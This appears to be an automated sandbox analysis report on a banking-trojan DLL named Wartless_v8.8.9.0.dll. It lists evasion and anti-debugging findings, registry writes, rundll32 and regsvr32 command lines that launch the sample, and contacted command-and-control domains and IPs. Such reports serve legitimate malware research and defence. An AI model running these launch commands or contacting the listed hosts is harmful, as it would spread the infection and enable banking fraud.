            Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_010C4872
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_04F94872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,6_2_04214872
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,9_2_04444872

            System Summary

            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: Wartless_v8.8.9.0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100022441_2_10002244
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C81DC1_2_010C81DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C6C621_2_010C6C62
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C4EF31_2_010C4EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F94EF35_2_04F94EF3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F96C625_2_04F96C62
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F981DC5_2_04F981DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690DF95_2_03690DF9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690DF75_2_03690DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04216C626_2_04216C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04214EF36_2_04214EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042181DC6_2_042181DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04446C629_2_04446C62
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04444EF39_2_04444EF3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044481DC9_2_044481DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100012BE NtMapViewOfSection,1_2_100012BE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001F61 GetProcAddress,NtCreateSection,memset,1_2_10001F61
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001077 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,1_2_10001077
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10002465 NtQueryVirtualMemory,1_2_10002465
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_010C77BB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C8401 NtQueryVirtualMemory,1_2_010C8401
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F977BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04F977BB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F98401 NtQueryVirtualMemory,5_2_04F98401
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690AB8 NtProtectVirtualMemory,5_2_03690AB8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690880 NtAllocateVirtualMemory,5_2_03690880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042177BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_042177BB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04218401 NtQueryVirtualMemory,6_2_04218401
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,9_2_044477BB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04448401 NtQueryVirtualMemory,9_2_04448401
            Source: Wartless_v8.8.9.0.dllBinary or memory string: OriginalFilenameWartless4 vs Wartless_v8.8.9.0.dll
            Source: Wartless_v8.8.9.0.dllBinary or memory string: OriginalFilenameRaCertMg.dll\ vs Wartless_v8.8.9.0.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
            Source: Wartless_v8.8.9.0.dllVirustotal: Detection: 19%
            Source: Wartless_v8.8.9.0.dllReversingLabs: Detection: 13%
            Source: Wartless_v8.8.9.0.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF854BAA01E360BD39.TMP
            Source: classification engineClassification label: mal100.troj.evad.winDLL@45/99@38/10
            Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\win.ini
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_010C2AB4
            Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Wartless_v8.8.9.0.dllStatic PE information: More than 200 imports for gdi32.dll
            Source: Wartless_v8.8.9.0.dllStatic PE information: More than 200 imports for user32.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10002233 push ecx; ret 1_2_10002243
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100021E0 push ecx; ret 1_2_100021E9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C81CB push ecx; ret 1_2_010C81DB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C7DE0 push ecx; ret 1_2_010C7DE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F97DE0 push ecx; ret 5_2_04F97DE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F981CB push ecx; ret 5_2_04F981DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690BFC push dword ptr [esp+0Ch]; ret 5_2_03690C10
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690BFC push dword ptr [esp+10h]; ret 5_2_03690C56
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_036905DF push dword ptr [ebp-00000284h]; ret 5_2_0369087F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690A64 push edx; ret 5_2_03690B11
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690A64 push dword ptr [esp+10h]; ret 5_2_03690BFB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_036906F5 push dword ptr [ebp-00000284h]; ret 5_2_03690764
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690AB8 push edx; ret 5_2_03690B11
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690880 push dword ptr [ebp-00000284h]; ret 5_2_036908B6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04217DE0 push ecx; ret 6_2_04217DE9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042181CB push ecx; ret 6_2_042181DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044481CB push ecx; ret 9_2_044481DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04447DE0 push ecx; ret 9_2_04447DE9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,1_2_10001BE8
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll

            Hooking and other Techniques for Hiding and Protection

            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\loaddll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100 Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100 Thread sleep count: 76 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW,
            Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWyb
            Source: loaddll32.exe, 00000001.00000002.809655751.000000000112F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@

            Anti Debugging

            Source: C:\Windows\System32\loaddll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,1_2_10001BE8
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_03690B14 mov eax, dword ptr fs:[00000030h] 5_2_03690B14
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_03690BFC mov eax, dword ptr fs:[00000030h] 5_2_03690BFC
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_03690A64 mov eax, dword ptr fs:[00000030h] 5_2_03690A64
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_03690C57 mov eax, dword ptr fs:[00000030h] 5_2_03690C57
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_03690CE8 mov eax, dword ptr fs:[00000030h] 5_2_03690CE8

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.46.120 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: www.nnnnnn.casa
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 162.255.119.177 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: nnnnnn.casa
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: intermedia.bar
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 198.54.117.212 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: nnnnnn.bar
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.64.119.233 80
            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 198.54.117.215 80
            Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 198.54.117.216 80
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp Binary or memory string: Program Manager
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_010C21BC cpuid 1_2_010C21BC
            Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_10001DCF GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_10001DCF
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_1000169C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_1000169C
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_010C21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_010C21BC

            Stealing of Sensitive Information

            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 2 Windows Management Instrumentation; 12 Native API; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Privilege Escalation: 1 DLL Side-Loading; 112 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Defense Evasion: 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 11 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Regsvr32; 1 Rundll32; Masquerading
            Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 1 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 114 System Information Discovery; 11 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
            Collection: 11 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 2 Non-Application Layer Protocol; 2 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

            [Behavior graph: ID 557481, Sample: Wartless_v8.8.9.0.dll, Start date: 21/01/2022, Architecture: WINDOWS, Score: 100]
            Hosts shown in the graph: intermedia.bar 31.41.46.120 (ASRELINKRU, Russian Federation); nnnnnn.casa 192.64.119.233 (NAMECHEAP-NETUS, United States); nnnnnn.bar 162.255.119.177 (NAMECHEAP-NETUS, United States); 198.54.117.215 (NAMECHEAP-NETUS, United States)

            | Source | Detection | Scanner | Label |
            |---|---|---|---|
            | Wartless_v8.8.9.0.dll | 20% | Virustotal | |
            | Wartless_v8.8.9.0.dll | 14% | ReversingLabs | |
            | Wartless_v8.8.9.0.dll | 100% | Joe Sandbox ML | |
            No Antivirus matches
            | Source | Detection | Scanner | Label |
            |---|---|---|---|
            | 1.2.loaddll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 |
            | 6.2.rundll32.exe.4210000.1.unpack | 100% | Avira | HEUR/AGEN.1108158 |
            | 9.2.rundll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 |
            | 9.2.rundll32.exe.4440000.1.unpack | 100% | Avira | HEUR/AGEN.1108158 |
            | 5.2.regsvr32.exe.4f90000.1.unpack | 100% | Avira | HEUR/AGEN.1108158 |
            | 5.2.regsvr32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 |
            | 6.2.rundll32.exe.10000000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8 |
            | 1.2.loaddll32.exe.10c0000.1.unpack | 100% | Avira | HEUR/AGEN.1108158 |
            | Source | Detection | Scanner | Label |
            |---|---|---|---|
            | nnnnnn.bar | 13% | Virustotal | |
            | nnnnnn.casa | 13% | Virustotal | |
            | www.nnnnnn.casa | 7% | Virustotal | |
            | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
            |---|---|---|---|---|---|
            | parkingpage.namecheap.com | 198.54.117.218 | true | false | | high |
            | intermedia.bar | 31.41.46.120 | true | true | | unknown |
            | nnnnnn.bar | 162.255.119.177 | true | true | | unknown |
            | nnnnnn.casa | 192.64.119.233 | true | true | | unknown |
            | www.nnnnnn.casa | unknown | unknown | true | | unknown |
            | www.nnnnnn.bar | unknown | unknown | true | | unknown |
                  unknown
